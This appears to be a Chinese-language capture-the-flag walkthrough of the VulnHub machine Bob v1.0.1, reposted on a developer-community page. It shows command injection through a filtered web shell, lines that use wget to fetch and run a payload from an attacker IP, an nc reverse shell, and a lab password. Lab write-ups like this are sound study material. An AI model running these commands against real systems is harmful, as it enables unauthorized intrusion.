首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

Bob_v1.0.1 walkthrough

https://www.vulnhub.com/entry/bob-101,226/

1.使用Nmap和nikto,发现有两个端口和服务:

80 apache2

25468 ssh

2.思路有两个:

(1)对ssh使用爆破,一般没有获得名户名之前爆破难度很大。

(2)对web服务,进行继续发掘。希望找到可以用的文件。

使用msfconsole和dirb,对网站目录进行扫描。

目录中有robots.txt,发现有可使用的信息。

发现一个dev_shell网页,经过测试对一命令进行了屏蔽,不过whoami && ls -al

是可以使用的,有两个思路:(1)使用如下命令

whoami && cd /tmp;wget http://192.168.1110.11:8080/shell;chmod +x shell;./shell

(2)查找是否存在nc。

whoami&&whereis nc

使用命令:

whoami&&nc 192.168.110.11 4445 -e /bin/sh

主机上:nc -vvlp 4445

得到一个shell,使用

python -c "import pty;pty.spawn('/bin/sh')";

$cd /tmp

$ wget http://192.168.1110.11:8080/shell

$ chmod +x shell

$ ./shell

msfconsole得到一个shell,

继续提权,

很遗憾,提权是失败的,那就是对网站目录进一步发掘。发现有几个用户,在/home/bob目录下发现一个目录:Secret 和文件login.txt.gpg,继续发现一下内容:

同时:找一个用户和密码:

elliot:theadminisdumb

使用这个通过ssh登录系统,尝试在这个文件下解密,得到一个密码:

使用bob账户登录,使用sudo --list

发现一下内容,得到sudo cat flag.txt

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20180811G1FQKW00?refer=cp_1026
  • 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

扫码

添加站长 进交流群

领取专属 10元无门槛券

私享最新 技术干货

扫码加入开发者社群
领券